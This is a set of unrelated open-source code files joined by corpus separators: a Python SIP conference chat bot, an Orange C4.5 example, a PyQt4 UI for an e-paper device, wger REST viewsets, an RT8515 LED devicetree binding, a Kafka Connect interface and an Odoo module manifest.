msg = "%(uri)s status is %(st)s" % \
{'uri': self.uri, 'st': self.bi.online_text}
self.bot.DEBUG(msg + "\n", INFO)
self.bot.broadcast_pager(self, msg)
if self.bi.sub_state==pj.SubscriptionState.ACTIVE:
if not self.in_chat:
self.in_chat = True
buddy.send_pager("Welcome to chatroom")
self.bot.broadcast_pager(self, self.uri + " has joined the chat room")
else:
self.in_chat = True
elif self.bi.sub_state==pj.SubscriptionState.NULL or \
self.bi.sub_state==pj.SubscriptionState.TERMINATED or \
self.bi.sub_state==pj.SubscriptionState.UNKNOWN:
self.buddy.delete()
self.buddy = None
if self.in_chat:
self.in_chat = False
self.bot.broadcast_pager(self, self.uri + " has left the chat room")
else:
self.in_chat = False
self.bot.on_member_left(self)
def on_typing(self, is_typing, call=None, buddy=None):
if is_typing:
msg = self.uri + " is typing..."
else:
msg = self.uri + " has stopped typing"
self.bot.broadcast_pager(self, msg)
def on_pager(self, mime_type, body, call=None, buddy=None):
if not self.bot.handle_cmd(self, None, body):
msg = self.uri + ": " + body
self.bot.broadcast_pager(self, msg, mime_type)
def on_pager_status(self, body, im_id, code, reason, call=None, buddy=None):
self.im_error = (code/100 != 2)
##############################################################################
#
#
# The Bot instance (singleton)
#
#
class Bot(pj.AccountCallback):
def __init__(self):
pj.AccountCallback.__init__(self, None)
self.lib = pj.Lib()
self.acc = None
self.calls = []
self.members = {}
self.cfg = None
def DEBUG(self, msg, level=TRACE):
print msg,
def helpstring(self):
return """
--h[elp] Display this help screen
--j[oin] Join the chat room
--html on|off Set to receive HTML or plain text
Participant commands:
--s[how] Show confbot settings
--leave Leave the chatroom
--l[ist] List all members
Admin commands:
--a[dmin] <CMD> Where <CMD> are:
list List the admins
add <URI> Add URI as admin
del <URI> Remove URI as admin
rr Reregister account to server
call <URI> Make call to the URI and add to voice conf
dc <URI> Disconnect call to URI
hold <URI> Hold call with that URI
update <URI> Send UPDATE to call with that URI
reinvite <URI> Send re-INVITE to call with that URI
"""
def listmembers(self):
msg = ""
for uri, m in self.members.iteritems():
msg = msg + str(m) + "\n"
return msg
def showsettings(self):
ai = self.acc.info()
msg = """
ConfBot status and settings:
URI: %(uri)s
Status: %(pres)s
Reg Status: %(reg_st)d
Reg Reason: %(reg_res)s
""" % {'uri': ai.uri, 'pres': ai.online_text, \
'reg_st': ai.reg_status, 'reg_res': ai.reg_reason}
return msg
def main(self, cfg_file):
try:
cfg = self.cfg = __import__(cfg_file)
self.lib.init(ua_cfg=cfg.ua_cfg, log_cfg=cfg.log_cfg, media_cfg=cfg.media_cfg)
self.lib.set_null_snd_dev()
transport = None
if cfg.udp_cfg:
transport = self.lib.create_transport(pj.TransportType.UDP, cfg.udp_cfg)
if cfg.tcp_cfg:
t = self.lib.create_transport(pj.TransportType.TCP, cfg.tcp_cfg)
if not transport:
transport = t
self.lib.start()
if cfg.acc_cfg:
self.DEBUG("Creating account %(uri)s..\n" % {'uri': cfg.acc_cfg.id}, INFO)
self.acc = self.lib.create_account(cfg.acc_cfg, cb=self)
else:
self.DEBUG("Creating account for %(t)s..\n" % \
{'t': transport.info().description}, INFO)
self.acc = self.lib.create_account_for_transport(transport, cb=self)
self.acc.set_basic_status(True)
# Wait for ENTER before quitting
print "Press q to quit or --help/--h for help"
while True:
input = sys.stdin.readline().strip(" \t\r\n")
if not self.handle_cmd(None, None, input):
if input=="q":
break
self.lib.destroy()
self.lib = None
except pj.Error, e:
print "Exception: " + str(e)
if self.lib:
self.lib.destroy()
self.lib = None
def broadcast_pager(self, exclude_member, body, mime_type="text/plain"):
self.DEBUG("Broadcast: " + body + "\n")
for uri, m in self.members.iteritems():
if m != exclude_member:
m.send_pager(body, mime_type)
def add_to_voice_conf(self, member):
if not member.call:
return
src_ci = member.call.info()
self.DEBUG("bot.add_to_voice_conf\n")
for uri, m in self.members.iteritems():
if m==member:
continue
if not m.call:
continue
dst_ci = m.call.info()
if dst_ci.media_state==pj.MediaState.ACTIVE and dst_ci.conf_slot!=-1:
self.lib.conf_connect(src_ci.conf_slot, dst_ci.conf_slot)
self.lib.conf_connect(dst_ci.conf_slot, src_ci.conf_slot)
def on_member_left(self, member):
if not member.call and not member.buddy:
del self.members[member.uri]
del member
def handle_admin_cmd(self, member, body):
if member and self.cfg.admins and not member.uri in self.cfg.admins:
member.send_pager("You are not admin")
return
args = body.split()
msg = ""
if len(args)==1:
args.append(" ")
if args[1]=="list":
if not self.cfg.admins:
msg = "Everyone is admin!"
else:
msg = str(self.cfg.admins)
elif args[1]=="add":
if len(args)!=3:
msg = "Usage: add <URI>"
else:
self.cfg.admins.append(args[2])
msg = args[2] + " added as admin"
elif args[1]=="del":
if len(args)!=3:
msg = "Usage: del <URI>"
elif args[2] not in self.cfg.admins:
msg = args[2] + " is not admin"
else:
self.cfg.admins.remove(args[2])
msg = args[2] + " has been removed from admins"
elif args[1]=="rr":
msg = "Reregistering.."
self.acc.set_registration(True)
elif args[1]=="call":
if len(args)!=3:
msg = "Usage: call <URI>"
else:
uri = args[2]
try:
call = self.acc.make_call(uri)
except pj.Error, e:
msg = "Error: " + str(e)
call = None
if call:
if not uri in self.members:
m = Member(self, uri)
self.members[m.uri] = m
else:
m = self.members[uri]
msg = "Adding " + m.uri + " to voice conference.."
m.join_call(call)
elif args[1]=="dc" or args[1]=="hold" or args[1]=="update" or args[1]=="reinvite":
if len(args)!=3:
msg = "Usage: " + args[1] + " <URI>"
else:
uri = args[2]
if not uri in self.members:
msg = "Member not found/URI doesn't match (note: case matters!)"
else:
m = self.members[uri]
if m.call:
if args[1]=="dc":
msg = "Disconnecting.."
m.call.hangup(603, "You're disconnected by admin")
elif args[1]=="hold":
msg = "Holding the call"
m.call.hold()
elif args[1]=="update":
msg = "Sending UPDATE"
m.call.update()
elif args[1]=="reinvite":
msg = "Sending re-INVITE"
m.call.reinvite()
else:
msg = "He is not in call"
else:
msg = "Unknown admin command " + body
#print "msg is '%(msg)s'" % {'msg': msg}
if True:
if member:
member.send_pager(msg)
else:
print msg
def handle_cmd(self, member, from_uri, body):
body = body.strip(" \t\r\n")
msg = ""
handled = True
if body=="--l" or body=="--list":
msg = self.listmembers()
if msg=="":
msg = "Nobody is here"
elif body[0:3]=="--s":
msg = self.showsettings()
elif body[0:6]=="--html" and member:
if body[8:11]=="off":
member.html = False
else:
member.html = True
elif body=="--h" or body=="--help":
msg = self.helpstring()
elif body=="--leave":
if not member or not member.buddy:
msg = "You are not in chatroom"
else:
member.buddy.unsubscribe()
elif body[0:3]=="--j":
if not from_uri in self.members:
m = Member(self, from_uri)
self.members[m.uri] = m
self.DEBUG("Adding " + m.uri + " to chatroom\n")
m.join_chat()
else:
m = self.members[from_uri]
self.DEBUG("Adding " + m.uri + " to chatroom\n")
m.join_chat()
elif body[0:3]=="--a":
self.handle_admin_cmd(member, body)
handled = True
else:
handled = False
if msg:
if member:
member.send_pager(msg)
elif from_uri:
self.acc.send_pager(from_uri, msg);
else:
print msg
return handled
def on_incoming_call(self, call):
self.DEBUG("on_incoming_call from %(uri)s\n" % {'uri': call.info().remote_uri}, INFO)
ci = call.info()
if not ci.remote_uri in self.members:
m = Member(self, ci.remote_uri)
self.members[m.uri] = m
m.join_call(call)
else:
m = self.members[ci.remote_uri]
m.join_call(call)
call.answer(200)
def on_incoming_subscribe(self, buddy, from_uri, contact_uri, pres_obj):
self.DEBUG("on_incoming_subscribe from %(uri)s\n" % from_uri, INFO)
return (200, 'OK')
def on_reg_state(self):
ai = self.acc.info()
self.DEBUG("Registration state: %(code)d/%(reason)s\n" % \
{'code': ai.reg_status, 'reason': ai.reg_reason}, INFO)
if ai.reg_status/100==2 and ai.reg_expires > 0:
self.acc.set_basic_status(True)
def on_pager(self, from_uri, contact, mime_type, body):
body = body.strip(" \t\r\n")
if not self.handle_cmd(None, from_uri, body):
self.acc.send_pager(from_uri, "You have not joined the chat room. Type '--join' to join or '--help' for the help")
def on_pager_status(self, to_uri, body, im_id, code, reason):
pass
def on_typing(self, from_uri, contact, is_typing):
pass
##############################################################################
#
#
# main()
#
#
if __name__ == "__main__":
bot = Bot()
bot.main(CFG_FILE) | unknown | codeparrot/codeparrot-clean | ||
# Description: Shows how to use C4.5 learner
# Category: learning
# Classes: C45Learner, C45Classifier
# Uses: iris
# Referenced: C45Learner.htm
import orange
data = orange.ExampleTable("iris")
tree = orange.C45Learner(data)
print "\n\nC4.5 with default arguments"
for i in data[:5]:
print tree(i), i.getclass()
print "\n\nC4.5 with m=100"
tree = orange.C45Learner(data, m=100)
for i in data[:5]:
print tree(i), i.getclass()
print "\n\nC4.5 with minObjs=100"
tree = orange.C45Learner(data, minObjs=100)
for i in data[:5]:
print tree(i), i.getclass()
print "\n\nC4.5 with -m 1 and -s"
lrn = orange.C45Learner()
lrn.commandline("-m 1 -s")
tree = lrn(data)
for i in data:
if i.getclass() != tree(i):
print i, tree(i)
import orngC45
tree = orange.C45Learner(data)
orngC45.printTree(tree)
print
import orngStat, orngTest
res = orngTest.crossValidation([orange.C45Learner(), orange.C45Learner(convertToOrange=1)], data)
print "Classification accuracy: %5.3f (converted to tree: %5.3f)" % tuple(orngStat.CA(res))
print "Brier score: %5.3f (converted to tree: %5.3f)" % tuple(orngStat.BrierScore(res)) | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/shunya/Dropbox/workspace/Python/eHayashiya/repaperCompanion.ui'
#
# Created: Mon Apr 27 17:53:27 2015
# by: PyQt4 UI code generator 4.11.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(788, 602)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout_2.addWidget(self.label_3)
self.comboBox = QtGui.QComboBox(self.centralwidget)
self.comboBox.setObjectName(_fromUtf8("comboBox"))
self.horizontalLayout_2.addWidget(self.comboBox)
self.connectPushButton = QtGui.QPushButton(self.centralwidget)
self.connectPushButton.setObjectName(_fromUtf8("connectPushButton"))
self.horizontalLayout_2.addWidget(self.connectPushButton)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.formLayout = QtGui.QFormLayout()
self.formLayout.setObjectName(_fromUtf8("formLayout"))
self.label_2 = QtGui.QLabel(self.centralwidget)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.formLayout.setWidget(0, QtGui.QFormLayout.LabelRole, self.label_2)
self.comboBoxDevice = QtGui.QComboBox(self.centralwidget)
self.comboBoxDevice.setObjectName(_fromUtf8("comboBoxDevice"))
self.formLayout.setWidget(0, QtGui.QFormLayout.FieldRole, self.comboBoxDevice)
self.verticalLayout_2.addLayout(self.formLayout)
self.imageLabel = QtGui.QLabel(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.imageLabel.sizePolicy().hasHeightForWidth())
self.imageLabel.setSizePolicy(sizePolicy)
self.imageLabel.setMinimumSize(QtCore.QSize(264, 176))
self.imageLabel.setObjectName(_fromUtf8("imageLabel"))
self.verticalLayout_2.addWidget(self.imageLabel)
self.sendPushButton = QtGui.QPushButton(self.centralwidget)
font = QtGui.QFont()
font.setPointSize(26)
self.sendPushButton.setFont(font)
self.sendPushButton.setObjectName(_fromUtf8("sendPushButton"))
self.verticalLayout_2.addWidget(self.sendPushButton)
self.saveXBMpushButton = QtGui.QPushButton(self.centralwidget)
self.saveXBMpushButton.setObjectName(_fromUtf8("saveXBMpushButton"))
self.verticalLayout_2.addWidget(self.saveXBMpushButton)
self.logPlainTextEdit = QtGui.QPlainTextEdit(self.centralwidget)
self.logPlainTextEdit.setObjectName(_fromUtf8("logPlainTextEdit"))
self.verticalLayout_2.addWidget(self.logPlainTextEdit)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.tabWidget = QtGui.QTabWidget(self.centralwidget)
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.verticalLayout_4 = QtGui.QVBoxLayout(self.tab)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.horizontalLayout_3 = QtGui.QHBoxLayout()
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.pushButtonAdd = QtGui.QPushButton(self.tab)
self.pushButtonAdd.setObjectName(_fromUtf8("pushButtonAdd"))
self.horizontalLayout_3.addWidget(self.pushButtonAdd)
self.pushButtonPaste = QtGui.QPushButton(self.tab)
self.pushButtonPaste.setObjectName(_fromUtf8("pushButtonPaste"))
self.horizontalLayout_3.addWidget(self.pushButtonPaste)
self.pushButtonRotate = QtGui.QPushButton(self.tab)
self.pushButtonRotate.setObjectName(_fromUtf8("pushButtonRotate"))
self.horizontalLayout_3.addWidget(self.pushButtonRotate)
self.pushButtonPreview = QtGui.QPushButton(self.tab)
self.pushButtonPreview.setObjectName(_fromUtf8("pushButtonPreview"))
self.horizontalLayout_3.addWidget(self.pushButtonPreview)
self.verticalLayout_4.addLayout(self.horizontalLayout_3)
self.view = GraphicsView(self.tab)
self.view.setObjectName(_fromUtf8("view"))
self.verticalLayout_4.addWidget(self.view)
self.tabWidget.addTab(self.tab, _fromUtf8(""))
self.tab_2 = QtGui.QWidget()
self.tab_2.setObjectName(_fromUtf8("tab_2"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.tab_2)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.groupBox = QtGui.QGroupBox(self.tab_2)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.verticalLayout = QtGui.QVBoxLayout(self.groupBox)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.gridLayout = QtGui.QGridLayout()
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.sectorLabel = QtGui.QLabel(self.groupBox)
self.sectorLabel.setObjectName(_fromUtf8("sectorLabel"))
self.gridLayout.addWidget(self.sectorLabel, 0, 0, 1, 1)
self.sectorSpinBox = QtGui.QSpinBox(self.groupBox)
self.sectorSpinBox.setMaximum(128)
self.sectorSpinBox.setProperty("value", 37)
self.sectorSpinBox.setObjectName(_fromUtf8("sectorSpinBox"))
self.gridLayout.addWidget(self.sectorSpinBox, 0, 1, 1, 1)
self.randomPushButton = QtGui.QPushButton(self.groupBox)
self.randomPushButton.setObjectName(_fromUtf8("randomPushButton"))
self.gridLayout.addWidget(self.randomPushButton, 0, 2, 1, 1)
self.qdPushButton = QtGui.QPushButton(self.groupBox)
self.qdPushButton.setObjectName(_fromUtf8("qdPushButton"))
self.gridLayout.addWidget(self.qdPushButton, 1, 0, 1, 1)
self.dPushButton = QtGui.QPushButton(self.groupBox)
self.dPushButton.setObjectName(_fromUtf8("dPushButton"))
self.gridLayout.addWidget(self.dPushButton, 1, 2, 1, 1)
self.uPushButton = QtGui.QPushButton(self.groupBox)
self.uPushButton.setObjectName(_fromUtf8("uPushButton"))
self.gridLayout.addWidget(self.uPushButton, 2, 0, 1, 2)
self.ePushButton = QtGui.QPushButton(self.groupBox)
self.ePushButton.setObjectName(_fromUtf8("ePushButton"))
self.gridLayout.addWidget(self.ePushButton, 2, 2, 1, 1)
self.wPushButton = QtGui.QPushButton(self.groupBox)
self.wPushButton.setObjectName(_fromUtf8("wPushButton"))
self.gridLayout.addWidget(self.wPushButton, 3, 0, 1, 2)
self.iPushButton = QtGui.QPushButton(self.groupBox)
self.iPushButton.setObjectName(_fromUtf8("iPushButton"))
self.gridLayout.addWidget(self.iPushButton, 3, 2, 1, 1)
self.fPushButton = QtGui.QPushButton(self.groupBox)
self.fPushButton.setObjectName(_fromUtf8("fPushButton"))
self.gridLayout.addWidget(self.fPushButton, 4, 0, 1, 1)
self.tPushButton = QtGui.QPushButton(self.groupBox)
self.tPushButton.setObjectName(_fromUtf8("tPushButton"))
self.gridLayout.addWidget(self.tPushButton, 4, 2, 1, 1)
self.lPushButton = QtGui.QPushButton(self.groupBox)
self.lPushButton.setObjectName(_fromUtf8("lPushButton"))
self.gridLayout.addWidget(self.lPushButton, 5, 0, 1, 2)
self.zPushButton = QtGui.QPushButton(self.groupBox)
self.zPushButton.setEnabled(False)
self.zPushButton.setObjectName(_fromUtf8("zPushButton"))
self.gridLayout.addWidget(self.zPushButton, 5, 2, 1, 1)
self.cmdLineEdit = QtGui.QLineEdit(self.groupBox)
self.cmdLineEdit.setObjectName(_fromUtf8("cmdLineEdit"))
self.gridLayout.addWidget(self.cmdLineEdit, 6, 0, 1, 2)
self.cmdSendPushButton = QtGui.QPushButton(self.groupBox)
self.cmdSendPushButton.setObjectName(_fromUtf8("cmdSendPushButton"))
self.gridLayout.addWidget(self.cmdSendPushButton, 6, 2, 1, 1)
self.verticalLayout.addLayout(self.gridLayout)
self.plainTextEdit = QtGui.QPlainTextEdit(self.groupBox)
self.plainTextEdit.setAcceptDrops(False)
self.plainTextEdit.setObjectName(_fromUtf8("plainTextEdit"))
self.verticalLayout.addWidget(self.plainTextEdit)
self.verticalLayout_3.addWidget(self.groupBox)
self.tabWidget.addTab(self.tab_2, _fromUtf8(""))
self.horizontalLayout.addWidget(self.tabWidget)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 788, 22))
self.menubar.setObjectName(_fromUtf8("menubar"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.tabWidget.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow", None))
self.label_3.setText(_translate("MainWindow", "Port", None))
self.connectPushButton.setText(_translate("MainWindow", "Connect", None))
self.label_2.setText(_translate("MainWindow", "Device", None))
self.imageLabel.setText(_translate("MainWindow", "Image Preview", None))
self.sendPushButton.setText(_translate("MainWindow", "Send to USB paper", None))
self.saveXBMpushButton.setText(_translate("MainWindow", "Save image as XBM file", None))
self.pushButtonAdd.setText(_translate("MainWindow", "Add file", None))
self.pushButtonPaste.setText(_translate("MainWindow", "Paste", None))
self.pushButtonRotate.setText(_translate("MainWindow", "Rotate", None))
self.pushButtonPreview.setText(_translate("MainWindow", "Preview", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab), _translate("MainWindow", "Image", None))
self.groupBox.setTitle(_translate("MainWindow", "Debug", None))
self.sectorLabel.setText(_translate("MainWindow", "Target Sector", None))
self.randomPushButton.setText(_translate("MainWindow", "Random", None))
self.qdPushButton.setText(_translate("MainWindow", "Quick Dump", None))
self.dPushButton.setText(_translate("MainWindow", "Dump Sector", None))
self.uPushButton.setText(_translate("MainWindow", "Upload Image", None))
self.ePushButton.setText(_translate("MainWindow", "Erase Sector", None))
self.wPushButton.setText(_translate("MainWindow", "Clear Screen", None))
self.iPushButton.setText(_translate("MainWindow", "Show Image", None))
self.fPushButton.setText(_translate("MainWindow", "Flash info", None))
self.tPushButton.setText(_translate("MainWindow", "Temprature", None))
self.lPushButton.setText(_translate("MainWindow", "List non-empty Sectors", None))
self.zPushButton.setText(_translate("MainWindow", "Erase Chip", None))
self.cmdSendPushButton.setText(_translate("MainWindow", "Send", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.tab_2), _translate("MainWindow", "Advanced", None))
from graphicsscene import GraphicsView | unknown | codeparrot/codeparrot-clean | ||
# -*- coding: utf-8 -*-
# This file is part of wger Workout Manager.
#
# wger Workout Manager is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# wger Workout Manager is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Workout Manager. If not, see <http://www.gnu.org/licenses/>.
from django.contrib.auth.models import User
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.decorators import detail_route
from wger.core.models import (
UserProfile,
Language,
DaysOfWeek,
License,
RepetitionUnit,
WeightUnit)
from wger.core.api.serializers import (
UsernameSerializer,
LanguageSerializer,
DaysOfWeekSerializer,
LicenseSerializer,
RepetitionUnitSerializer,
WeightUnitSerializer
)
from wger.core.api.serializers import UserprofileSerializer
from wger.utils.permissions import UpdateOnlyPermission, WgerPermission
class UserProfileViewSet(viewsets.ModelViewSet):
'''
API endpoint for workout objects
'''
is_private = True
serializer_class = UserprofileSerializer
permission_classes = (WgerPermission, UpdateOnlyPermission)
ordering_fields = '__all__'
def get_queryset(self):
'''
Only allow access to appropriate objects
'''
return UserProfile.objects.filter(user=self.request.user)
def get_owner_objects(self):
'''
Return objects to check for ownership permission
'''
return [(User, 'user')]
@detail_route()
def username(self, request, pk):
'''
Return the username
'''
user = self.get_object().user
return Response(UsernameSerializer(user).data)
class LanguageViewSet(viewsets.ReadOnlyModelViewSet):
'''
API endpoint for workout objects
'''
queryset = Language.objects.all()
serializer_class = LanguageSerializer
ordering_fields = '__all__'
filter_fields = ('full_name',
'short_name')
class DaysOfWeekViewSet(viewsets.ReadOnlyModelViewSet):
'''
API endpoint for workout objects
'''
queryset = DaysOfWeek.objects.all()
serializer_class = DaysOfWeekSerializer
ordering_fields = '__all__'
filter_fields = ('day_of_week', )
class LicenseViewSet(viewsets.ReadOnlyModelViewSet):
'''
API endpoint for workout objects
'''
queryset = License.objects.all()
serializer_class = LicenseSerializer
ordering_fields = '__all__'
filter_fields = ('full_name',
'short_name',
'url')
class RepetitionUnitViewSet(viewsets.ReadOnlyModelViewSet):
'''
API endpoint for repetition units objects
'''
queryset = RepetitionUnit.objects.all()
serializer_class = RepetitionUnitSerializer
ordering_fields = '__all__'
filter_fields = ('name', )
class WeightUnitViewSet(viewsets.ReadOnlyModelViewSet):
'''
API endpoint for weight units objects
'''
queryset = WeightUnit.objects.all()
serializer_class = WeightUnitSerializer
ordering_fields = '__all__'
filter_fields = ('name', ) | unknown | codeparrot/codeparrot-clean | ||
# SPDX-License-Identifier: (GPL-2.0-only OR BSD-2-Clause)
%YAML 1.2
---
$id: http://devicetree.org/schemas/leds/richtek,rt8515.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: Richtek RT8515 1.5A dual channel LED driver
maintainers:
- Linus Walleij <linusw@kernel.org>
description: |
The Richtek RT8515 is a dual channel (two mode) LED driver that
supports driving a white LED in flash or torch mode. The maximum
current for each mode is defined in hardware using two resistors
RFS and RTS.
properties:
compatible:
const: richtek,rt8515
enf-gpios:
maxItems: 1
description: A connection to the 'ENF' (enable flash) pin.
ent-gpios:
maxItems: 1
description: A connection to the 'ENT' (enable torch) pin.
richtek,rfs-ohms:
minimum: 7680
maximum: 367000
description: The resistance value of the RFS resistor. This
resistors limits the maximum flash current. This must be set
for the property flash-max-microamp to work, the RFS resistor
defines the range of the dimmer setting (brightness) of the
flash LED.
richtek,rts-ohms:
minimum: 7680
maximum: 367000
description: The resistance value of the RTS resistor. This
resistors limits the maximum torch current. This must be set
for the property torch-max-microamp to work, the RTS resistor
defines the range of the dimmer setting (brightness) of the
torch LED.
led:
type: object
$ref: common.yaml#
properties:
function: true
color: true
flash-max-timeout-us: true
flash-max-microamp:
maximum: 700000
description: The maximum current for flash mode
is hardwired to the component using the RFS resistor to
ground. The maximum hardware current setting is calculated
according to the formula Imax = 5500 / RFS. The lowest
allowed resistance value is 7.86 kOhm giving an absolute
maximum current of 700mA. By setting this attribute in
the device tree, you can further restrict the maximum
current below the hardware limit. This requires the RFS
to be defined as it defines the maximum range.
led-max-microamp:
maximum: 700000
description: The maximum current for torch mode
is hardwired to the component using the RTS resistor to
ground. The maximum hardware current setting is calculated
according to the formula Imax = 5500 / RTS. The lowest
allowed resistance value is 7.86 kOhm giving an absolute
maximum current of 700mA. By setting this attribute in
the device tree, you can further restrict the maximum
current below the hardware limit. This requires the RTS
to be defined as it defines the maximum range.
additionalProperties: false
required:
- compatible
- ent-gpios
- enf-gpios
- led
additionalProperties: false
examples:
- |
#include <dt-bindings/gpio/gpio.h>
#include <dt-bindings/leds/common.h>
led-controller {
compatible = "richtek,rt8515";
enf-gpios = <&gpio4 12 GPIO_ACTIVE_HIGH>;
ent-gpios = <&gpio4 13 GPIO_ACTIVE_HIGH>;
richtek,rfs-ohms = <16000>;
richtek,rts-ohms = <100000>;
led {
function = LED_FUNCTION_FLASH;
color = <LED_COLOR_ID_WHITE>;
flash-max-timeout-us = <250000>;
flash-max-microamp = <150000>;
led-max-microamp = <25000>;
};
};
... | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/leds/richtek,rt8515.yaml |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.transforms;
import org.apache.kafka.common.Configurable;
import org.apache.kafka.common.config.ConfigDef;
import org.apache.kafka.connect.connector.ConnectRecord;
import java.io.Closeable;
/**
* Single message transformation for Kafka Connect record types.
* <p>
* Connectors can be configured with transformations to make lightweight message-at-a-time modifications.
* <p>Kafka Connect may discover implementations of this interface using the Java {@link java.util.ServiceLoader} mechanism.
* To support this, implementations of this interface should also contain a service provider configuration file in
* {@code META-INF/services/org.apache.kafka.connect.transforms.Transformation}.
*
* <p>Implement {@link org.apache.kafka.common.metrics.Monitorable} to enable the transformation to register metrics.
* The following tags are automatically added to all metrics registered: <code>connector</code> set to connector name,
* <code>task</code> set to the task id and <code>transformation</code> set to the transformation alias.
*
* @param <R> The type of record (must be an implementation of {@link ConnectRecord})
*/
public interface Transformation<R extends ConnectRecord<R>> extends Configurable, Closeable {
/**
* Apply transformation to the {@code record} and return another record object (which may be {@code record} itself)
* or {@code null}, corresponding to a map or filter operation respectively.
* <p>
* A transformation must not mutate objects reachable from the given {@code record}
* (including, but not limited to, {@link org.apache.kafka.connect.header.Headers Headers},
* {@link org.apache.kafka.connect.data.Struct Structs}, {@code Lists}, and {@code Maps}).
* If such objects need to be changed, a new {@link ConnectRecord} should be created and returned.
* <p>
* The implementation must be thread-safe.
*
* @param record the record to be transformed; may not be null
* @return the transformed record; may be null to indicate that the record should be dropped
*/
R apply(R record);
/** Configuration specification for this transformation. */
ConfigDef config();
/** Signal that this transformation instance will no longer will be used. */
@Override
void close();
} | java | github | https://github.com/apache/kafka | connect/api/src/main/java/org/apache/kafka/connect/transforms/Transformation.java |
# -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Issue Tracking',
'version': '1.0',
'category': 'Project Management',
'sequence': 9,
'summary': 'Support, Bug Tracker, Helpdesk',
'description': """
Track Issues/Bugs Management for Projects
=========================================
This application allows you to manage the issues you might face in a project like bugs in a system, client complaints or material breakdowns.
It allows the manager to quickly check the issues, assign them and decide on their status quickly as they evolve.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/project-management',
'depends': [
'sales_team',
'project',
],
'data': [
'project_issue_view.xml',
'project_issue_menu.xml',
'report/project_issue_report_view.xml',
'security/project_issue_security.xml',
'security/ir.model.access.csv',
'res_config_view.xml',
'project_issue_data.xml'
],
'demo': ['project_issue_demo.xml'],
'test': [
'test/issue_users.yml',
'test/subscribe_issue.yml',
'test/issue_process.yml',
'test/issue_demo.yml'
],
'installable': True,
'auto_install': False,
'application': True,
}
